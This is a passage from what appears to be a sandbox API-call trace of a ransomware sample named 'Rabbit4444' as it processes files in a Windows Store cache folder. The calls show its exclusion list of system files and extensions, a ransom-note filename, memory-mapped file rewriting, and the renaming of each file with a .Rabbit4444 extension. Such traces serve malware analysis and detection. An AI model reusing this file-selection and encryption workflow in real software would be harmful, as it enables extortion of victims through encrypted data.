lpString2="boot") returned -1 [0062.790] lstrcmpiW (lpString1="1bec6d4a-6687-4295-b59f-5b3c048ab97c", lpString2="ids.txt") returned -1 [0062.790] lstrcmpiW (lpString1="1bec6d4a-6687-4295-b59f-5b3c048ab97c", lpString2="NTUSER.DAT") returned -1 [0062.790] lstrcpyW (in: lpString1=0x130ec04, lpString2="1bec6d4a-6687-4295-b59f-5b3c048ab97c" | out: lpString1="1bec6d4a-6687-4295-b59f-5b3c048ab97c") returned="1bec6d4a-6687-4295-b59f-5b3c048ab97c" [0062.791] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\1bec6d4a-6687-4295-b59f-5b3c048ab97c", dwFileAttributes=0x0) returned 1 [0062.792] lstrlenW (lpString="1bec6d4a-6687-4295-b59f-5b3c048ab97c") returned 36 [0062.792] lstrlenW (lpString="Rabbit4444") returned 10 [0062.792] lstrcmpiW (lpString1="3c048ab97c", lpString2="Rabbit4444") returned -1 [0062.792] lstrlenW (lpString=".dll") returned 4 [0062.792] lstrcmpiW (lpString1="b97c", lpString2=".dll") returned 1 [0062.792] lstrlenW (lpString=".lnk") returned 4 [0062.792] lstrcmpiW (lpString1="b97c", lpString2=".lnk") returned 1 [0062.792] lstrlenW (lpString=".ini") returned 4 [0062.792] lstrcmpiW (lpString1="b97c", lpString2=".ini") returned 1 [0062.792] lstrlenW (lpString=".sys") returned 4 [0062.792] lstrcmpiW (lpString1="b97c", lpString2=".sys") returned 1 [0062.792] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\1bec6d4a-6687-4295-b59f-5b3c048ab97c" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localcache\\perusercache_0\\1bec6d4a-6687-4295-b59f-5b3c048ab97c"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0062.792] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0062.792] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15410317273) returned 1 [0062.792] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=177812) returned 1 [0062.793] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0062.793] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0062.793] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2b9a0, lpName=0x0) returned 0x27c [0062.795] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2b9a0) returned 0x70000 [0062.803] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e2c0 [0062.803] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0062.803] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e2c0 | out: hHeap=0xe0000) returned 1 [0062.803] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0062.803] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0062.803] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0062.803] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0062.803] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0062.803] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15411408799) returned 1 [0062.803] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0062.803] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0062.803] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.805] CloseHandle (hObject=0x27c) returned 1 [0062.805] CloseHandle (hObject=0x2a0) returned 1 [0062.805] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\1bec6d4a-6687-4295-b59f-5b3c048ab97c.Rabbit4444") returned 149 [0062.805] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\1bec6d4a-6687-4295-b59f-5b3c048ab97c" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localcache\\perusercache_0\\1bec6d4a-6687-4295-b59f-5b3c048ab97c"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\1bec6d4a-6687-4295-b59f-5b3c048ab97c.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localcache\\perusercache_0\\1bec6d4a-6687-4295-b59f-5b3c048ab97c.rabbit4444"), dwFlags=0x1) returned 1 [0062.806] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1510392, ftCreationTime.dwHighDateTime=0x1d336df, ftLastAccessTime.dwLowDateTime=0xe1510392, ftLastAccessTime.dwHighDateTime=0x1d336df, ftLastWriteTime.dwLowDateTime=0xe1582a0b, ftLastWriteTime.dwHighDateTime=0x1d336df, nFileSizeHigh=0x0, nFileSizeLow=0x1af8a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1dcea220-55cd-470a-a680-6d186485df4e", cAlternateFileName="1DCEA2~1")) returned 1 [0062.806] lstrcmpiW (lpString1="1dcea220-55cd-470a-a680-6d186485df4e", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.806] lstrcmpiW (lpString1="1dcea220-55cd-470a-a680-6d186485df4e", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.806] lstrcmpiW (lpString1="1dcea220-55cd-470a-a680-6d186485df4e", lpString2="Rabbit4444.exe") returned -1 [0062.806] lstrcmpiW (lpString1="1dcea220-55cd-470a-a680-6d186485df4e", lpString2=".") returned 1 [0062.806] lstrcmpiW (lpString1="1dcea220-55cd-470a-a680-6d186485df4e", lpString2="..") returned 1 [0062.806] lstrcmpiW (lpString1="1dcea220-55cd-470a-a680-6d186485df4e", lpString2="windows") returned -1 [0062.806] lstrcmpiW (lpString1="1dcea220-55cd-470a-a680-6d186485df4e", lpString2="bootmgr") returned -1 [0062.806] lstrcmpiW (lpString1="1dcea220-55cd-470a-a680-6d186485df4e", lpString2="pagefile.sys") returned -1 [0062.806] lstrcmpiW (lpString1="1dcea220-55cd-470a-a680-6d186485df4e", lpString2="boot") returned -1 [0062.806] lstrcmpiW (lpString1="1dcea220-55cd-470a-a680-6d186485df4e", lpString2="ids.txt") returned -1 [0062.806] lstrcmpiW (lpString1="1dcea220-55cd-470a-a680-6d186485df4e", lpString2="NTUSER.DAT") returned -1 [0062.807] lstrcpyW (in: lpString1=0x130ec04, lpString2="1dcea220-55cd-470a-a680-6d186485df4e" | out: lpString1="1dcea220-55cd-470a-a680-6d186485df4e") returned="1dcea220-55cd-470a-a680-6d186485df4e" [0062.807] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\1dcea220-55cd-470a-a680-6d186485df4e", dwFileAttributes=0x0) returned 1 [0062.807] lstrlenW (lpString="1dcea220-55cd-470a-a680-6d186485df4e") returned 36 [0062.807] lstrlenW (lpString="Rabbit4444") returned 10 [0062.807] lstrcmpiW (lpString1="186485df4e", lpString2="Rabbit4444") returned -1 [0062.807] lstrlenW (lpString=".dll") returned 4 [0062.807] lstrcmpiW (lpString1="df4e", lpString2=".dll") returned 1 [0062.807] lstrlenW (lpString=".lnk") returned 4 [0062.807] lstrcmpiW (lpString1="df4e", lpString2=".lnk") returned 1 [0062.808] lstrlenW (lpString=".ini") returned 4 [0062.808] lstrcmpiW (lpString1="df4e", lpString2=".ini") returned 1 [0062.808] lstrlenW (lpString=".sys") returned 4 [0062.808] lstrcmpiW (lpString1="df4e", lpString2=".sys") returned 1 [0062.808] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\1dcea220-55cd-470a-a680-6d186485df4e" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localcache\\perusercache_0\\1dcea220-55cd-470a-a680-6d186485df4e"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0062.808] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0062.808] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15411872937) returned 1 [0062.808] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=110474) returned 1 [0062.808] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0062.808] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0062.808] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1b290, lpName=0x0) returned 0x27c [0062.809] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1b290) returned 0x70000 [0062.815] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e2c0 [0062.815] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0062.815] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e2c0 | out: hHeap=0xe0000) returned 1 [0062.815] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0062.815] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0062.815] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0062.815] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0062.816] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0062.816] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15412630984) returned 1 [0062.816] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0062.816] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0062.816] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.817] CloseHandle (hObject=0x27c) returned 1 [0062.817] CloseHandle (hObject=0x2a0) returned 1 [0062.817] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\1dcea220-55cd-470a-a680-6d186485df4e.Rabbit4444") returned 149 [0062.817] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\1dcea220-55cd-470a-a680-6d186485df4e" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localcache\\perusercache_0\\1dcea220-55cd-470a-a680-6d186485df4e"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\1dcea220-55cd-470a-a680-6d186485df4e.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localcache\\perusercache_0\\1dcea220-55cd-470a-a680-6d186485df4e.rabbit4444"), dwFlags=0x1) returned 1 [0062.818] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd062fb2, ftCreationTime.dwHighDateTime=0x1d336df, ftLastAccessTime.dwLowDateTime=0xdd062fb2, ftLastAccessTime.dwHighDateTime=0x1d336df, ftLastWriteTime.dwLowDateTime=0xdd062fb2, ftLastWriteTime.dwHighDateTime=0x1d336df, nFileSizeHigh=0x0, nFileSizeLow=0x9bc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1fc7d273-b221-48f6-9872-22321b90204a", cAlternateFileName="1FC7D2~1")) returned 1 [0062.818] lstrcmpiW (lpString1="1fc7d273-b221-48f6-9872-22321b90204a", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.818] lstrcmpiW (lpString1="1fc7d273-b221-48f6-9872-22321b90204a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.818] lstrcmpiW (lpString1="1fc7d273-b221-48f6-9872-22321b90204a", lpString2="Rabbit4444.exe") returned -1 [0062.818] lstrcmpiW (lpString1="1fc7d273-b221-48f6-9872-22321b90204a", lpString2=".") returned 1 [0062.818] lstrcmpiW (lpString1="1fc7d273-b221-48f6-9872-22321b90204a", lpString2="..") returned 1 [0062.818] lstrcmpiW (lpString1="1fc7d273-b221-48f6-9872-22321b90204a", lpString2="windows") returned -1 [0062.818] lstrcmpiW (lpString1="1fc7d273-b221-48f6-9872-22321b90204a", lpString2="bootmgr") returned -1 [0062.818] lstrcmpiW (lpString1="1fc7d273-b221-48f6-9872-22321b90204a", lpString2="pagefile.sys") returned -1 [0062.818] lstrcmpiW (lpString1="1fc7d273-b221-48f6-9872-22321b90204a", lpString2="boot") returned -1 [0062.818] lstrcmpiW (lpString1="1fc7d273-b221-48f6-9872-22321b90204a", lpString2="ids.txt") returned -1 [0062.818] lstrcmpiW (lpString1="1fc7d273-b221-48f6-9872-22321b90204a", lpString2="NTUSER.DAT") returned -1 [0062.818] lstrcpyW (in: lpString1=0x130ec04, lpString2="1fc7d273-b221-48f6-9872-22321b90204a" | out: lpString1="1fc7d273-b221-48f6-9872-22321b90204a") returned="1fc7d273-b221-48f6-9872-22321b90204a" [0062.818] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\1fc7d273-b221-48f6-9872-22321b90204a", dwFileAttributes=0x0) returned 1 [0062.819] lstrlenW (lpString="1fc7d273-b221-48f6-9872-22321b90204a") returned 36 [0062.819] lstrlenW (lpString="Rabbit4444") returned 10 [0062.819] lstrcmpiW (lpString1="321b90204a", lpString2="Rabbit4444") returned -1 [0062.819] lstrlenW (lpString=".dll") returned 4 [0062.819] lstrcmpiW (lpString1="204a", lpString2=".dll") returned 1 [0062.819] lstrlenW (lpString=".lnk") returned 4 [0062.819] lstrcmpiW (lpString1="204a", lpString2=".lnk") returned 1 [0062.819] lstrlenW (lpString=".ini") returned 4 [0062.819] lstrcmpiW (lpString1="204a", lpString2=".ini") returned 1 [0062.819] lstrlenW (lpString=".sys") returned 4 [0062.819] lstrcmpiW (lpString1="204a", lpString2=".sys") returned 1 [0062.819] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\1fc7d273-b221-48f6-9872-22321b90204a" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localcache\\perusercache_0\\1fc7d273-b221-48f6-9872-22321b90204a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0062.819] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0062.819] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15413015941) returned 1 [0062.819] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=2492) returned 1 [0062.820] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0062.820] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101e20 [0062.820] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xcc0, lpName=0x0) returned 0x27c [0062.821] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xcc0) returned 0x70000 [0062.823] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e2c0 [0062.823] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0062.823] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e2c0 | out: hHeap=0xe0000) returned 1 [0062.823] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0062.823] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0062.823] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0062.823] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0062.823] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0062.823] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15413381936) returned 1 [0062.823] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0062.823] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101e20 | out: hHeap=0xe0000) returned 1 [0062.823] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.823] CloseHandle (hObject=0x27c) returned 1 [0062.823] CloseHandle (hObject=0x2a0) returned 1 [0062.823] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\1fc7d273-b221-48f6-9872-22321b90204a.Rabbit4444") returned 149 [0062.823] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\1fc7d273-b221-48f6-9872-22321b90204a" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localcache\\perusercache_0\\1fc7d273-b221-48f6-9872-22321b90204a"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\1fc7d273-b221-48f6-9872-22321b90204a.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localcache\\perusercache_0\\1fc7d273-b221-48f6-9872-22321b90204a.rabbit4444"), dwFlags=0x1) returned 1 [0062.824] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd016b57, ftCreationTime.dwHighDateTime=0x1d336df, ftLastAccessTime.dwLowDateTime=0xdd016b57, ftLastAccessTime.dwHighDateTime=0x1d336df, ftLastWriteTime.dwLowDateTime=0xdd0af547, ftLastWriteTime.dwHighDateTime=0x1d336df, nFileSizeHigh=0x0, nFileSizeLow=0x4e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="564654d8-f181-4d50-84f0-95228e86ec66", cAlternateFileName="564654~1")) returned 1 [0062.824] lstrcmpiW (lpString1="564654d8-f181-4d50-84f0-95228e86ec66", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.824] lstrcmpiW (lpString1="564654d8-f181-4d50-84f0-95228e86ec66", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.824] lstrcmpiW (lpString1="564654d8-f181-4d50-84f0-95228e86ec66", lpString2="Rabbit4444.exe") returned -1 [0062.824] lstrcmpiW (lpString1="564654d8-f181-4d50-84f0-95228e86ec66", lpString2=".") returned 1 [0062.824] lstrcmpiW (lpString1="564654d8-f181-4d50-84f0-95228e86ec66", lpString2="..") returned 1 [0062.824] lstrcmpiW (lpString1="564654d8-f181-4d50-84f0-95228e86ec66", lpString2="windows") returned -1 [0062.824] lstrcmpiW (lpString1="564654d8-f181-4d50-84f0-95228e86ec66", lpString2="bootmgr") returned -1 [0062.824] lstrcmpiW (lpString1="564654d8-f181-4d50-84f0-95228e86ec66", lpString2="pagefile.sys") returned -1 [0062.824] lstrcmpiW (lpString1="564654d8-f181-4d50-84f0-95228e86ec66", lpString2="boot") returned -1 [0062.824] lstrcmpiW (lpString1="564654d8-f181-4d50-84f0-95228e86ec66", lpString2="ids.txt") returned -1 [0062.824] lstrcmpiW (lpString1="564654d8-f181-4d50-84f0-95228e86ec66", lpString2="NTUSER.DAT") returned -1 [0062.824] lstrcpyW (in: lpString1=0x130ec04, lpString2="564654d8-f181-4d50-84f0-95228e86ec66" | out: lpString1="564654d8-f181-4d50-84f0-95228e86ec66") returned="564654d8-f181-4d50-84f0-95228e86ec66" [0062.824] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\564654d8-f181-4d50-84f0-95228e86ec66", dwFileAttributes=0x0) returned 1 [0062.825] lstrlenW (lpString="564654d8-f181-4d50-84f0-95228e86ec66") returned 36 [0062.825] lstrlenW (lpString="Rabbit4444") returned 10 [0062.825] lstrcmpiW (lpString1="228e86ec66", lpString2="Rabbit4444") returned -1 [0062.825] lstrlenW (lpString=".dll") returned 4 [0062.825] lstrcmpiW (lpString1="ec66", lpString2=".dll") returned 1 [0062.825] lstrlenW (lpString=".lnk") returned 4 [0062.825] lstrcmpiW (lpString1="ec66", lpString2=".lnk") returned 1 [0062.825] lstrlenW (lpString=".ini") returned 4 [0062.825] lstrcmpiW (lpString1="ec66", lpString2=".ini") returned 1 [0062.825] lstrlenW (lpString=".sys") returned 4 [0062.825] lstrcmpiW (lpString1="ec66", lpString2=".sys") returned 1 [0062.825] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\564654d8-f181-4d50-84f0-95228e86ec66" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localcache\\perusercache_0\\564654d8-f181-4d50-84f0-95228e86ec66"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0062.825] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0062.825] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15413624120) returned 1 [0062.826] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=19968) returned 1 [0062.826] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0062.826] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0062.826] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5100, lpName=0x0) returned 0x27c [0062.827] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5100) returned 0x70000 [0062.829] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e2c0 [0062.829] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0062.829] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e2c0 | out: hHeap=0xe0000) returned 1 [0062.829] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0062.829] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0062.829] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0062.829] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0062.830] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0062.830] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15414037253) returned 1 [0062.830] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0062.830] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0062.830] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.830] CloseHandle (hObject=0x27c) returned 1 [0062.830] CloseHandle (hObject=0x2a0) returned 1 [0062.830] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\564654d8-f181-4d50-84f0-95228e86ec66.Rabbit4444") returned 149 [0062.830] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\564654d8-f181-4d50-84f0-95228e86ec66" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localcache\\perusercache_0\\564654d8-f181-4d50-84f0-95228e86ec66"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\564654d8-f181-4d50-84f0-95228e86ec66.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localcache\\perusercache_0\\564654d8-f181-4d50-84f0-95228e86ec66.rabbit4444"), dwFlags=0x1) returned 1 [0062.831] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc478053, ftCreationTime.dwHighDateTime=0x1d336df, ftLastAccessTime.dwLowDateTime=0xdc478053, ftLastAccessTime.dwHighDateTime=0x1d336df, ftLastWriteTime.dwLowDateTime=0xdc58317b, ftLastWriteTime.dwHighDateTime=0x1d336df, nFileSizeHigh=0x0, nFileSizeLow=0x799, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6ac60a78-519d-4397-8cfd-8288aad6ad67", cAlternateFileName="6AC60A~1")) returned 1 [0062.831] lstrcmpiW (lpString1="6ac60a78-519d-4397-8cfd-8288aad6ad67", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.831] lstrcmpiW 